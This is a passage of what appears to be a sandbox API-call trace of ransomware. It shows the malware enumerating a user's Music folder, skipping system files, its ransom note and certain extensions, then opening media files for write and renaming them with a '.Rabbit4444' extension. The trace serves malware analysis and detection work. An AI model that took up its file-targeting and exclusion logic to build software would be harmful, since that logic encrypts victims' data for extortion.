(lpString1="8z-l_J.m4a", lpString2="Rabbit4444") returned -1 [0048.939] lstrlenW (lpString=".dll") returned 4 [0048.939] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0048.940] lstrlenW (lpString=".lnk") returned 4 [0048.940] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0048.940] lstrlenW (lpString=".ini") returned 4 [0048.940] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0048.940] lstrlenW (lpString=".sys") returned 4 [0048.940] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0048.940] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5oW38z-l_J.m4a" (normalized: "c:\\users\\fd1hvy\\music\\5ow38z-l_j.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.940] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.940] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14025057615) returned 1 [0048.940] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=20540) returned 1 [0048.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0048.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0048.940] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5340, lpName=0x0) returned 0x298 [0048.940] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5340) returned 0x70000 [0048.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0048.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0048.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.941] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14025207414) returned 1 [0048.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0048.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0048.941] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.942] CloseHandle (hObject=0x298) returned 1 [0048.942] CloseHandle (hObject=0x278) returned 1 [0048.943] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\5oW38z-l_J.m4a.Rabbit4444") returned 47 [0048.943] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\5oW38z-l_J.m4a" (normalized: "c:\\users\\fd1hvy\\music\\5ow38z-l_j.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\5oW38z-l_J.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\5ow38z-l_j.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0048.944] InterlockedExchangeAdd (in: Addend=0xff618, Value=20544 | out: Addend=0xff618) returned 18830464 [0048.944] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3446 [0048.944] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77cb9b0, ftCreationTime.dwHighDateTime=0x1d4d4c1, ftLastAccessTime.dwLowDateTime=0x9d890580, ftLastAccessTime.dwHighDateTime=0x1d4cecc, ftLastWriteTime.dwLowDateTime=0x9d890580, ftLastWriteTime.dwHighDateTime=0x1d4cecc, nFileSizeHigh=0x0, nFileSizeLow=0x18ea5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7h4-5A5wS wr.m4a", cAlternateFileName="7H4-5A~1.M4A")) returned 1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="Rabbit4444.exe") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2=".") returned 1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="..") returned 1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="windows") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="bootmgr") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="pagefile.sys") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="boot") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="ids.txt") returned -1 [0048.944] lstrcmpiW (lpString1="7h4-5A5wS wr.m4a", lpString2="NTUSER.DAT") returned -1 [0048.944] lstrcpyW (in: lpString1=0x130eb64, lpString2="7h4-5A5wS wr.m4a" | out: lpString1="7h4-5A5wS wr.m4a") returned="7h4-5A5wS wr.m4a" [0048.944] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\7h4-5A5wS wr.m4a", dwFileAttributes=0x0) returned 1 [0048.945] lstrlenW (lpString="7h4-5A5wS wr.m4a") returned 16 [0048.945] lstrlenW (lpString="Rabbit4444") returned 10 [0048.945] lstrcmpiW (lpString1="5wS wr.m4a", lpString2="Rabbit4444") returned -1 [0048.945] lstrlenW (lpString=".dll") returned 4 [0048.945] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0048.945] lstrlenW (lpString=".lnk") returned 4 [0048.945] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0048.945] lstrlenW (lpString=".ini") returned 4 [0048.945] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0048.945] lstrlenW (lpString=".sys") returned 4 [0048.945] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0048.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\7h4-5A5wS wr.m4a" (normalized: "c:\\users\\fd1hvy\\music\\7h4-5a5ws wr.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.945] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.945] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14025586087) returned 1 [0048.945] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=102053) returned 1 [0048.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0048.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0048.945] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x191b0, lpName=0x0) returned 0x298 [0048.945] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x191b0) returned 0x70000 [0048.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.949] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14025928598) returned 1 [0048.949] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0048.949] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0048.949] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.950] CloseHandle (hObject=0x298) returned 1 [0048.950] CloseHandle (hObject=0x278) returned 1 [0048.953] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\7h4-5A5wS wr.m4a.Rabbit4444") returned 49 [0048.953] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\7h4-5A5wS wr.m4a" (normalized: "c:\\users\\fd1hvy\\music\\7h4-5a5ws wr.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\7h4-5A5wS wr.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\7h4-5a5ws wr.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0048.953] InterlockedExchangeAdd (in: Addend=0xff618, Value=102064 | out: Addend=0xff618) returned 18851008 [0048.953] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3447 [0048.954] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49febf80, ftCreationTime.dwHighDateTime=0x1d4c775, ftLastAccessTime.dwLowDateTime=0xe0c996d0, ftLastAccessTime.dwHighDateTime=0x1d4cff2, ftLastWriteTime.dwLowDateTime=0xe0c996d0, ftLastWriteTime.dwHighDateTime=0x1d4cff2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="atFhmMZ", cAlternateFileName="")) returned 1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="Rabbit4444.exe") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2=".") returned 1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="..") returned 1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="windows") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="bootmgr") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="pagefile.sys") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="boot") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="ids.txt") returned -1 [0048.954] lstrcmpiW (lpString1="atFhmMZ", lpString2="NTUSER.DAT") returned -1 [0048.954] lstrcpyW (in: lpString1=0x130eb64, lpString2="atFhmMZ" | out: lpString1="atFhmMZ") returned="atFhmMZ" [0048.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0048.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3c) returned 0x114c58 [0048.954] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6670 [0048.954] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2857250, ftCreationTime.dwHighDateTime=0x1d4d165, ftLastAccessTime.dwLowDateTime=0x87fe0640, ftLastAccessTime.dwHighDateTime=0x1d4cddf, ftLastWriteTime.dwLowDateTime=0x87fe0640, ftLastWriteTime.dwHighDateTime=0x1d4cddf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ddgoRP", cAlternateFileName="")) returned 1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="Rabbit4444.exe") returned -1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2=".") returned 1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="..") returned 1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="windows") returned -1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="bootmgr") returned 1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="pagefile.sys") returned -1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="boot") returned 1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="ids.txt") returned -1 [0048.954] lstrcmpiW (lpString1="ddgoRP", lpString2="NTUSER.DAT") returned -1 [0048.954] lstrcpyW (in: lpString1=0x130eb64, lpString2="ddgoRP" | out: lpString1="ddgoRP") returned="ddgoRP" [0048.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0048.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0x115000 [0048.954] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6390 [0048.954] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.954] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.954] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.954] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.955] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.955] lstrcpyW (in: lpString1=0x130eb64, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.955] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", dwFileAttributes=0x22) returned 1 [0048.955] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", dwFileAttributes=0x6) returned 1 [0048.955] lstrlenW (lpString="desktop.ini") returned 11 [0048.955] lstrlenW (lpString="Rabbit4444") returned 10 [0048.955] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.955] lstrlenW (lpString=".dll") returned 4 [0048.955] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.955] lstrlenW (lpString=".lnk") returned 4 [0048.955] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.955] lstrlenW (lpString=".ini") returned 4 [0048.955] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.955] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c33490, ftCreationTime.dwHighDateTime=0x1d4ca09, ftLastAccessTime.dwLowDateTime=0x6e170b40, ftLastAccessTime.dwHighDateTime=0x1d4d1a5, ftLastWriteTime.dwLowDateTime=0x6e170b40, ftLastWriteTime.dwHighDateTime=0x1d4d1a5, nFileSizeHigh=0x0, nFileSizeLow=0x17403, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i6PnD5hZJ2yN.mp3", cAlternateFileName="I6PND5~1.MP3")) returned 1 [0048.955] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="Rabbit4444.exe") returned -1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2=".") returned 1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="..") returned 1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="windows") returned -1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="bootmgr") returned 1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="pagefile.sys") returned -1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="boot") returned 1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="ids.txt") returned -1 [0048.956] lstrcmpiW (lpString1="i6PnD5hZJ2yN.mp3", lpString2="NTUSER.DAT") returned -1 [0048.956] lstrcpyW (in: lpString1=0x130eb64, lpString2="i6PnD5hZJ2yN.mp3" | out: lpString1="i6PnD5hZJ2yN.mp3") returned="i6PnD5hZJ2yN.mp3" [0048.956] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\i6PnD5hZJ2yN.mp3", dwFileAttributes=0x0) returned 1 [0048.956] lstrlenW (lpString="i6PnD5hZJ2yN.mp3") returned 16 [0048.956] lstrlenW (lpString="Rabbit4444") returned 10 [0048.956] lstrcmpiW (lpString1="hZJ2yN.mp3", lpString2="Rabbit4444") returned -1 [0048.956] lstrlenW (lpString=".dll") returned 4 [0048.956] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0048.956] lstrlenW (lpString=".lnk") returned 4 [0048.956] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0048.956] lstrlenW (lpString=".ini") returned 4 [0048.956] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0048.956] lstrlenW (lpString=".sys") returned 4 [0048.956] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0048.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\i6PnD5hZJ2yN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\i6pnd5hzj2yn.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.956] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.956] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14026722304) returned 1 [0048.957] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=95235) returned 1 [0048.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0048.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0048.957] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17710, lpName=0x0) returned 0x298 [0048.957] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17710) returned 0x70000 [0048.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.959] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14027015837) returned 1 [0048.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0048.959] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0048.960] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.960] CloseHandle (hObject=0x298) returned 1 [0048.961] CloseHandle (hObject=0x278) returned 1 [0048.963] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\i6PnD5hZJ2yN.mp3.Rabbit4444") returned 49 [0048.964] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\i6PnD5hZJ2yN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\i6pnd5hzj2yn.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\i6PnD5hZJ2yN.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\i6pnd5hzj2yn.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0048.964] InterlockedExchangeAdd (in: Addend=0xff618, Value=95248 | out: Addend=0xff618) returned 18953072 [0048.964] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3450 [0048.964] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6af07400, ftCreationTime.dwHighDateTime=0x1d4cdcd, ftLastAccessTime.dwLowDateTime=0x5f1c1ac0, ftLastAccessTime.dwHighDateTime=0x1d4cad1, ftLastWriteTime.dwLowDateTime=0x5f1c1ac0, ftLastWriteTime.dwHighDateTime=0x1d4cad1, nFileSizeHigh=0x0, nFileSizeLow=0x10faa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J42Z.mp3", cAlternateFileName="")) returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="Rabbit4444.exe") returned -1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2=".") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="..") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="windows") returned -1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="bootmgr") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="pagefile.sys") returned -1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="boot") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="ids.txt") returned 1 [0048.964] lstrcmpiW (lpString1="J42Z.mp3", lpString2="NTUSER.DAT") returned -1 [0048.964] lstrcpyW (in: lpString1=0x130eb64, lpString2="J42Z.mp3" | out: lpString1="J42Z.mp3") returned="J42Z.mp3" [0048.964] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\J42Z.mp3", dwFileAttributes=0x0) returned 1 [0048.965] lstrlenW (lpString="J42Z.mp3") returned 8 [0048.965] lstrlenW (lpString="Rabbit4444") returned 10 [0048.965] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.965] lstrlenW (lpString=".dll") returned 4 [0048.965] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0048.965] lstrlenW (lpString=".lnk") returned 4 [0048.965] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0048.965] lstrlenW (lpString=".ini") returned 4 [0048.965] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0048.965] lstrlenW (lpString=".sys") returned 4 [0048.965] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0048.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\J42Z.mp3" (normalized: "c:\\users\\fd1hvy\\music\\j42z.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.965] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.965] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14027586876) returned 1 [0048.965] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69546) returned 1 [0048.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0048.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0048.965] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x112b0, lpName=0x0) returned 0x298 [0048.965] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x112b0) returned 0x70000 [0048.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.968] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.968] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.968] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.968] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.968] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14027925939) returned 1 [0048.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 